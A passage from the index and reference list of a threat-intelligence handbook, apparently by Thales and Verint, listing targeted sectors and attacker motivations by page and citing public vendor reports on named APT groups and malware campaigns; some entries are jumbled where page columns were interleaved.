Financial services - p. 22, 26, 38, 48, 50, 64, 66, 72, 76, 88, 94, 104, 116, 136, 140, 144, 148, 150, 152, 160, 168, 172, 184, 190, 192, 196, 200
Food and agriculture - p. 56, 144, 148, 158, 188, 190
Government Agencies - p. 14, 18, 22, 26, 38, 40, 44, 48, 58, 64, 72, 76, 80, 82, 84, 88, 94, 96, 104, 106, 124, 126, 134, 136, 140, 144, 148, 150, 152, 158, 162, 164, 168, 172, 176, 178, 180, 182, 184, 188, 190, 192, 196, 200
Healthcare - p. 56, 64, 68, 76, 88, 92, 94, 144, 148, 158, 160, 178, 184, 188
High-Tech - p. 22, 26, 38, 64, 66, 68, 76, 84, 88, 106, 116, 126, 130, 136, 152, 156, 160, 162, 178, 180
Hospitality - p. 18, 26, 54, 56, 88, 116, 144, 162, 184
Industry - p. 152
International organizations - p. 14, 18, 22, 40, 42, 64, 84, 88, 94, 104, 140, 144, 148, 168, 182
Labor Unions - p. 178
Legal services - p. 22, 94, 160
Manufacturing - p. 22, 44, 68, 76, 88, 94, 144, 158, 160, 162, 178, 19
Maritime and shipbuilding - p. 106
Media - p. 18, 22, 38, 42, 50, 58, 64, 66, 76, 88, 92, 94, 106, 112, 126, 130, 134, 136, 144, 150, 152, 160, 168, 178, 184, 188, 196, 198, 200
Military - p. 22, 42, 58, 80, 82, 88, 96, 104, 126, 134, 144, 158, 168, 176, 178, 188, 200
Naval - p. 22, 40, 44, 88, 134, 144, 160
Non-governmental organizations - p. 48
Pharmaceutical - p. 88, 144, 160, 178
Political organizations - p. 44, 48, 58, 84, 88, 96, 112, 126, 134, 140, 144, 158, 162, 168, 178, 182, 184
Public sector - p. 48
Research - p. 22, 76, 82, 84, 88, 144, 162, 178
Retail - p. 54, 56, 66, 88, 116, 126, 144, 158, 162, 190, 198

206


Software - p. 48
Telecommunication - p. 92
Transportation - p. 58, 68, 88, 144, 158, 178, 188, 190, 198
Unknown - p. 114
End users - p. 60

MOTIVATIONS
Attacks on industrial security systems almost exclusively with destructive intent - p. 100, 108
Coercion - p. 94, 126, 130
Cyber espionage - p. 26, 34, 42, 82, 176
Data Theft - p. 42, 84, 104, 156
Dominance - p. 126, 130
Espionage - p. 18, 22, 30, 38, 40, 42, 44, 64, 68, 76, 80, 84, 92, 96, 106, 112, 114, 152, 156, 164
Financial gain - p. 46, 50, 54, 56, 60, 66, 72, 88, 94, 116, 120, 124, 126, 130, 134, 160, 190
Ideology - p. 58, 88, 94, 126, 134, 136, 140, 144, 148, 150, 162, 168, 172, 178, 180, 182, 184, 188, 192, 196
Notoriety - p. 50, 88, 126, 134
Personal-satisfaction - p. 130, 140, 158, 198
Political manipulation - p. 18
Revenge - p. 126, 130, 134, 184
S

abotage - p. 34
Strategic support - p. 200
Unpredictable - p. 94, 126, 134, 140, 158, 178

207
References _

208


209

ATK1
28/07/2014, TrendMicro, ESILE Targeted Attack Campaign Hits APAC Governments
16/06/2015, PaloAlto, Operation Lotus Blossom
17/06/2015, Securelist, The Spring Dragon APT - More Intrusion Techniques Rolled In
18/12/2015, PaloAlto, Attack on French Diplomat Linked to Operation Lotus Blossom
23/12/2015, pwc, ELISE: Security Through Obesity
03/02/2016, PaloAlto, Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?
24/07/2017, Securelist, Spring Dragon – Updated Activity
27/01/2018, Accenture Security, DragonFish Delivers New Form Of Elise Malware Targeting Asean Defence Ministers' Meeting And Associates
13/02/2018, RSA, Lotus Blossom Continues ASEAN Targeting

ATK2
17/09/2013, Symantec, Hidden Lynx – Professional Hackers for Hire, https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/hidden_lynx.pdf
21/09/2013, FireEye, Operation DeputyDog: Zero-Day (CVE-2013-3893) Attack Against Japanese Targets, https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html
22/09/2013, FireEye, Operation DeputyDog Part 2: Zero-Day Exploit Analysis (CVE-2013-3893), https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-part-2-zero-day-exploit-analysis-cve-2013-3893.html
10/11/2013, FireEye, Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method, https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html
13/02/2014, FireEye, Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website, https://www.fireeye.com/blog/threat-research/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html
14/05/2015, FireEye, Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic, https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf

MITRE ATT&CK, APT28, https://attack.mitre.org/groups/G0007/
27/10/2014, FireEye, APT28: A WINDOW INTO RUSSIA'S CYBER ESPIONAGE OPERATIONS?, https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
27/10/2014, TrendMicro, Operation Pawn Storm, https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf
04/02/2015, TrendMicro, Pawn Storm Update: iOS Espionage App Found, https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/
16/04/2015, TrendMicro, Operation Pawn Storm Ramps Up its Activities; Targets NATO, White House, https://blog.trendmicro.com/trendlabs-security-intelligence/operation-pawn-storm-ramps-up-its-activities-targets-nato-white-house/
18/04/2015, FireEye, Operation RussianDoll: Adobe & Windows Zero-Day Exploits Likely Leveraged by Russia's APT28 in Highly-Targeted Attack, https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
19/06/2015, NETZPOLITIK.ORG, Digital Attack on German Parliament: Investigative Report on the Hack of the Left Party Infrastructure in Bundestag, https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/
08/09/2015, F-Secure, Sofacy Recycles Carberp and Metasploit Code, https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/
04/12/2015, Kaspersky, Sofacy APT hits high profile targets with updated toolset, https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
17/12/2015, Bitdefender, APT28 Under the Scope, https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf
14/06/2016, PaloAlto, New Sofacy Attacks Against US Government Agency, https://unit42.paloaltonetworks.com/unit42-new-sofacy-attacks-against-us-government-agency/
16/06/2016, Dell Secureworks, Threat Group 4127 Targets Hillary Clinton Presidential Campaign, https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign
20/07/2016, PaloAlto, Technical Walkthrough: Office Test Persistence Method Used In Recent Sofacy Attacks, https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/
13/09/2016, WADA, WADA Confirms Attack by Russian Cyber Espionage Group, https://www.wada-ama.org/en/media/news/2016-09/wada-confirms-attack-by-russian-cyber-espionage-group
26/09/2016, PaloAlto, Sofacy's 'Komplex' OS X Trojan, https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/
17/10/2016, PaloAlto, 'DealersChoice' is Sofacy's Flash Player Exploit Platform, https://unit42.paloaltonetworks.com/unit42-dealerschoice-sofacys-flash-player-exploit-platform/
20/10/2016, ESET, En Route with Sednit Part 1, https://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf
25/10/2016, ESET, En Route with Sednit Part 2, https://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf
26/10/2016, ESET, En Route with Sednit Part 3, https://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf
22/12/2016, CrowdStrike, Use of Fancy Bear Android Malware In Tracking Of Ukrainian Field Artillery Units, https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf
29/12/2016, NCCIC, GRIZZLY STEPPE – Russian Malicious Cyber Activity, https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
11/01/2017, FireEye, APT28: At The Center Of The Storm, https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
14/02/2017, PaloAlto, XAgentOSX: Sofacy's XAgent macOS Tool, https://unit42.paloaltonetworks.com/unit42-xagentosx-sofacys-xagent-macos-tool/
25/04/2017, TrendMicro, Two Years of Pawn Storm, https://documents.trendmicro.com/assets/wp/wp-two-years-of-pawn-storm.pdf
11/08/2017, FireEye, APT28 Targets Hospitality Sector, Presents Threat to Travelers, https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html
22/10/2017, Talos, "Cyber Conflict" Decoy Document Used In Real Cyber Conflict, https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html

210


07/11/2017, McAfee, Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack, https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign/
20/02/2018, Kaspersky, A Slice of 2017 Sofacy Activity, https://securelist.com/a-slice-of-2017-sofacy-activity/83930/
28/02/2018, PaloAlto, Sofacy Attacks Multiple Government Entities, https://unit42.paloaltonetworks.com/unit42-sofacy-attacks-multiple-government-entities/
09/03/2018, Kaspersky, Masha and these Bears, https://securelist.com/masha-and-these-bears/84311/
15/03/2018, PaloAlto, Sofacy Uses DealersChoice to Target European Government Agency, https://unit42.paloaltonetworks.com/unit42-sofacy-uses-dealerschoice-target-european-government-agency/
24/04/2018, ESET, Sednit update: Analysis of Zebrocy, https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
06/06/2018, PaloAlto, Sofacy Group's Parallel Attacks, https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/
27/09/2018, ESET, LoJax: First UEFI rootkit found in the wild, courtesy of the Sednit group, https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf
04/10/2018, Symantec, APT28: New Espionage Operations Target Military and Government Organizations, https://www.symantec.com/blogs/election-security/apt28-espionage-military-government
20/11/2018, ESET, Sednit: What's going on with Zebrocy?, https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/
20/11/2018, PaloAlto, Sofacy Continues Global Attacks and Wheels Out New 'Cannon' Trojan, https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
29/11/2018, Accenture, SNAKEMACKEREL, https://www.accenture.com/t20181129t203820z__w__/us-en/_acnmedia/pdf-90/accenture-snakemackerel-delivers-zekapab-malware.pdf
12/12/2018, PaloAlto, Dear Joohn: The Sofacy Group's Global Campaign, https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/
18/12/2018, PaloAlto, Sofacy Creates New 'Go' Variant of Zebrocy Tool, https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/
22/05/2019, ESET, A journey to Zebrocy land, https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/
05/08/2019, Microsoft, Corporate IoT – a path to intrusion, https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/

ATK3
2019, The All-Purpose Sword: North Korea's Cyber Operations and Strategies, https://ccdcoe.org/uploads/2019/06/Art_08_The-All-Purpose-Sword.pdf

ATK4
MITRE, APT37, https://attack.mitre.org/groups/G0067/
17/06/2016, Kaspersky, Operation Daybreak, https://securelist.com/operation-daybreak/75100/
16/01/2018, Talos, Korea In The Crosshairs, https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html
20/02/2018, FireEye, APT37 (Reaper): The Overlooked North Korean Actor, https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html
03/05/2018, AhnLab, Detailed Analysis of Red Eyes Hacking Group, https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]%20Red_Eyes_Hacking_Group_Report%20(1).pdf
13/05/2019, Kaspersky, ScarCruft continues to evolve, introduces Bluetooth harvester, https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

ATK5
https://pylos.co/2018/11/18/cozybear-in-from-the-cold/
https://securityaffairs.co/wordpress/78195/apt/apt29-malware-analysis.html
https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html

ATK6
MITRE, Dragonfly 2.0, https://attack.mitre.org/groups/G0074/
17/12/2010, Symantec, Dream Loader: the new bot C&C engine of your dreams
07/07/2014, Symantec, Dragonfly: Cyberespionage Attacks Against Energy Suppliers
27/10/2014, Netresec, Full Disclosure of Havex Trojans
20/10/2017, Symantec, Dragonfly: Western energy sector targeted by sophisticated attack group
20/10/2017, US-CERT, Alert (TA17-293A) Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors
16/03/2018, Cylance, Energetic DragonFly DYMALLOY Bear 2.0
04/04/2018, NCSC, Hostile state actors compromising UK organisations with focus on engineering and industrial control companies
11/07/2019, Dell Secureworks, MCMD Malware Analysis
11/07/2019, Dell Secureworks, Updated Karagany Malware Targets Energy Sector
24/07/2019, Dell Secureworks, Resurgent Iron Liberty Targeting Energy Sector

ATK8
2017, Security Affairs, https://securityaffairs.co/wordpress/62811/malware/babar-2007-sample.html
2015, Infosec Institute, https://resources.infosecinstitute.com/animal-farm-apt-and-the-shadow-of-france-intelligence/#gref
2015, Security Affairs, http://securityaffairs.co/wordpress/34462/intelligence/babar-casper-french-intelligence.html
2015, Security Affairs, http://securityaffairs.co/ordpress/38204/cyber-crime/dino-malware-animal-farm.html
2015, ESET, https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/
2015, ESET, https://www.welivesecurity.com/2015/06/30/dino-spying-malware-analyzed/
2015, Kaspersky, https://securelist.com/animals-in-the-apt-farm/69114/

ATK11
MITRE, Patchwork, https://attack.mitre.org/groups/G0040/
20/05/2013, Operation Hangover, http://www.thecre.com/fnews/wp-content/uploads/2013/05/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf
07/07/2016, Cymmetria, Unveiling PATCHWORK The Copy-Paste APT, https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf
08/07/2016, Kaspersky, The Dropping Elephant – aggressive cyber-espionage in the Asian region, https://securelist.com/the-dropping-elephant-actor/75328/

211
25/07/2016, Symantec, Patchwork cyberespionage group expands targets from governments to wide range of industries, https://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries
08/08/2016, Forcepoint, MONSOON - Analysis Of An APT Campaign, https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign
30/01/2017, PaloAlto, Downeks and Quasar RAT Used in Recent Targeted Attacks Against Governments, https://unit42.paloaltonetworks.com/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/
05/04/2017, Fortinet, In-Depth Look at New Variant of MONSOON APT Backdoor, Part 1, https://www.fortinet.com/blog/threat-research/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1.html
05/04/2017, Fortinet, In-Depth Look at New Variant of MONSOON APT Backdoor, Part 2, https://www.fortinet.com/blog/threat-research/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2.html
12/06/2017, bellingcat, Bahamut, Pursuing a Cyber Espionage Actor in the Middle East, https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/
07/03/2018, PaloAlto, Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent, https://unit42.paloaltonetworks.com/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/
08/03/2018, Netscout, Donot Team Leverages New Modular Malware Framework in South Asia, https://www.netscout.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia
30/03/2018, 360.net, Analysis of the latest cyberattack activities of sensitive organizations in China by the APT organization, https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/
07/06/2018, Volexity, Patchwork APT Group Targets US Think Tanks, https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/
29/08/2018, TrendMicro, The Urpage Connection to Bahamut, Confucius and Patchwork, https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/
09/10/2018, TrendMicro, Untangling the Patchwork Cyberespionage Group, https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf
09/10/2018, TrendMicro, Untangling the Patchwork Cyberespionage Group (Technical Brief), https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite
29/11/2018, 360.net, Analysis Of Targeted Attack Against Pakistan By Exploiting InPage Vulnerability And Related APT

30/11/2008, ThreatExpert, Agent.btz - A Threat That Hit Pentagon
25/08/2010, The New York Times, Military Computer Attack Confirmed
28/02/2014, G-Data, Uroburos - highly complex espionage software with Russian roots
02/2014, BAE Systems, The Snake Campaign
12/03/2014, Kaspersky, Agent.btz: a Source of Inspiration?
12/03/2014, deresz@gmail.com & tecamac@gmail.com, Uroburos: the snake rootkit
07/08/2014, Kaspersky, The Epic Turla Operation
08/12/2014, Kaspersky, The 'Penquin' Turla - A Turla/Snake/Uroburos Malware for Linux
09/09/2015, Kaspersky, Satellite Turla: APT Command and Control in the Sky
11/2015, FireEye, PINPOINTING TARGETS: SECURITY REIMAGINED - Exploiting Web Analytics to Ensnare Victims
14/01/2016, Symantec, The Waterbug attack group
23/05/2016, MELANI:GovCERT, APT Case RUAG
14/01/2016, Yle, Russian group behind 2013 Foreign Ministry hack
30/06/2016, BitDefender, Pacifier APT
17/08/2016, PassiveTotal, Snakes in the Satellites: On-going Turla Infrastructure
02/02/2017, Kaspersky, KopiLuwak: A New JavaScript Payload from Turla
30/03/2017, ESET, Carbon Paper: Peering into Turla's second stage backdoor
03/05/2017, PaloAlto, Kazuar: Multiplatform Espionage Backdoor with API Access
06/06/2017, ESET, Turla's watering hole campaign: An updated Firefox extension abusing Instagram
17/08/2017, ProofPoint, Turla APT actor refreshes KopiLuwak JavaScript backdoor for use in G20-themed attack
30/08/2017, Kaspersky, Introducing WhiteBear
30/08/2017, ESET, Gazing at Gazer - Turla's new second stage backdoor
22/11/2017, NCSC, Advisory: Turla group malware
08/01/2018, ESET, Diplomats in Eastern Europe bitten by a Turla mosquito
18/01/2018, NCSC, Turla group update Neuron malware
01/03/2018, The Guardian, German government intranet under 'ongoing attack'
22/05/2018, ESET, Turla Mosquito: A shift towards more
generic tools
Groups, https://ti.360.net/blog/articles/analysis-of-targeted-
attack-against-pakistan-by-exploiting-inpage-vulnerability-and- ESET, 22/08/2018, Turla Outlook Backdoor - Analysis of an
related-apt-groups-english/ unusual Turla backdoor
02/08/2019, NSHC, SectorE02 Updates YTY Framework in Kaspersky, 04/10/2018, Shedding Skin – Turla’s Fresh Faces
New Targeted Campaign Against Pakistan Government, https://
ESET, 07/05/2019, Turla LightNeuron: An email too far
threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-
in-new-targeted-campaign-against-pakistan-government/ ESET, 29/05/2019, A dive into Turla PowerShell usage
Symantec, 19/06/2019, Waterbug: Espionage Group Rolls Out
ATK13 Brand-New Toolset in Attacks Against Governments
Malpedia, Turla group
APT Groups and Operations ATK14
http://blog.talosintelligence.com/2017/10/bad-rabbit.html
MITRE ATT&CK, Group: Turla, Waterbug, WhiteBear
https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-
L os Angeles Times, 28/11/2008, Pentagon computer networks
9ea1d8961d3b
attacked

212 The Cyberthreat Handbook • Thales - Verint
https://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html
https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/
https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/
https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/
https://blog.reversinglabs.com/blog/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics
https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
https://blog.talosintelligence.com/2017/07/the-medoc-connection.html
https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/
https://blog.yoroi.company/research/greyenergy-welcome-to-2019/
https://dragos.com/wp-content/uploads/2017-Review-Industrial-Control-System-Threats.pdf
https://dragos.com/wp-content/uploads/CrashOverride-01.pdf
https://ics.sans.org/blog/2016/01/09/confirmation-of-a-coordinated-attack-on-the-ukrainian-power-grid
https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/
https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/
https://labsblog.f-secure.com/2017/06/30/what-good-is-a-not-for-profit-eternal-petya/
https://marcusedmondson.com/2019/01/18/black-energy-analysis/
https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4
https://securelist.com/bad-rabbit-ransomware/82851/
https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/
https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/
https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/
https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/
https://securelist.com/from-blackenergy-to-expetr/78937/
https://securelist.com/greyenergys-overlap-with-zebrocy/89506/
https://securelist.com/schroedingers-petya/78870/
https://securityaffairs.co/wordpress/79967/malware/greyenergy-welcome-to-2019.html
https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/
https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/
https://web.archive.org/web/20160406000554/http://www.isightpartners.com/2016/01/ukraine-and-sandworm-team/
https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/
https://www.cfr.org/interactive/cyber-operations/black-energy
https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/
https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/
https://www.eset.com/int/greyenergy-exposed/
https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html
https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html
https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/
https://www.nozominetworks.com/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/
https://www.riskiq.com/blog/labs/badrabbit/
https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik
https://www.us-cert.gov/ncas/alerts/TA17-163A
https://www.welivesecurity.com/2015/07/30/operation-potao-express/
https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/
https://www.welivesecurity.com/2016/01/04/blackenergy-trojan-strikes-again-attacks-ukrainian-electric-power-industry/
https://www.welivesecurity.com/2016/01/11/blackenergy-and-the-ukrainian-power-outage-what-we-really-know/
https://www.welivesecurity.com/2016/01/20/new-wave-attacks-ukrainian-power-industry/
https://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt/
https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/
https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/
https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/
https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/
https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/
https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/
https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf
https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/
http://www.intezer.com/notpetya-returns-bad-rabbit/
http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/

ATK15
MITRE ATT&CK, Group: Threat Group-3390, TG-3390, …
Malpedia, Emissary Panda
APT Groups and Operations
05/08/2015, Dell Secureworks, Threat Group 3390 Cyberespionage
16/09/2015, TrendMicro, Operation Iron Tiger: Attackers Shift from East Asia to the United States Appendix
17/10/2016, ThreatConnect, A Tale of Two Targets

References _
27/06/2017, Dell Secureworks, BRONZE UNION Cyberespionage Persists Despite Disclosures
01/02/2018, BitDefender, Operation PZChao: a possible return of the Iron Tiger APT
17/04/2018, NCC Group, Decoding network data from a Gh0st RAT variant
18/05/2018, NCC Group, Emissary Panda – A potential new malicious tool
13/06/2018, Securelist, LuckyMouse hits national data center to organize country-level waterholing campaign
23/07/2018, CSE, Chinese APT 27’s long-term espionage campaign in Syria is still ongoing
27/02/2019, Dell Secureworks, A Peek into BRONZE UNION’s Toolbox
28/05/2019, PaloAlto, Emissary Panda Attacks Middle East Government Sharepoint Servers

ATK17
FireEye, We believe we’re seeing an evolution and development in Iranian-based cyber activity. In years past, Iranian actors primarily committed politically motivated website defacement and DDoS attacks, https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf
04/04/2018, New MacOS Backdoor Linked to OceanLotus Found, https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/
08/05/2019, OceanLotus’ Attacks to Indochinese Peninsula: Evolution of Targets, Techniques and Procedure, https://ti.360.net/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/
20/03/2019, Fake or Fake: Keeping up with OceanLotus decoys, https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/
01/03/2018, OceanLotus Old techniques, new backdoor, https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf
02/04/2019, Report: OceanLotus APT Group Leveraging Steganography, https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html
17/10/2019, Report: The SpyRATs of OceanLotus, https://threatvector.cylance.com/en_us/home/report-the-spyrats-of-oceanlotus.html
01/02/2019, Tracking OceanLotus’ new Downloader, KerrDown, https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/
25/04/2019, OceanLotus On ASEAN Affairs, https://blog.telsy.com/oceanlotus-on-asean-affairs/
14/05/2017, FireEye, Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations, https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
19/01/2014, EFF, Vietnamese Malware Gets Very Personal, https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal
30/03/2010, The chilling effects of malware, https://security.googleblog.com/2010/03/chilling-effects-of-malware.html
08/05/2019, 360Net, OceanLotus’ Attacks to Indochinese Peninsula: Evolution of Targets, Techniques and Procedure, https://ti.360.net/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/
25/04/2019, Telsy, OceanLotus On ASEAN Affairs, https://blog.telsy.com/oceanlotus-on-asean-affairs/

ATK23
26/09/2013, Kaspersky, THE ‘ICEFOG’ APT: A TALE OF CLOAK AND THREE DAGGERS
14/01/2014, Kaspersky, The Icefog APT Hits US Targets With Java Backdoor
03/06/2019, FireEye, Into the Fog - The Return of ICEFOG APT

ATK27
18/01/2018, Lookout, Dark Caracal - Cyber-espionage at a Global Scale SECURITY RESEARCH REPORT, https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf
20/01/2018, YA LIBNAN, Dark Caracal: Analysis of Lebanon’s recently discovered state-sponsored hacking, http://yalibnan.com/2018/01/20/dark-caracal-analysis-of-lebanons-recently-discovered-state-sponsored-hacking/
MITRE, Dark Caracal, https://attack.mitre.org/groups/G0070/
19/01/2018, Security Affairs, Dark Caracal APT – Lebanese intelligence is spying on targets for years, https://securityaffairs.co/wordpress/67915/hacking/dark-caracal-apt.html
12/02/2018, Security Affairs, Researchers from CSE ZLAB malware Analysis Laboratory analyzed a set of samples of the Pallas malware family used by the Dark Caracal APT in its hacking operations., https://securityaffairs.co/wordpress/68983/apt/dark-caracal-pallas-malware.html
14/05/2019, DARKNET DIARIES, EP 38: Dark Caracal, https://darknetdiaries.com/episode/38/

ATK29
16/03/2018, FireEye, Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries
10/07/2018, FireEye, Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally
13/11/2018, Recorded Future, Chinese Threat Actor TEMP.Periscope Targets UK-Based Engineering Company Using Russian APT Techniques

ATK32
MITRE, FIN7, https://attack.mitre.org/groups/G0046/
07/03/2017, FireEye, FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings, https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html
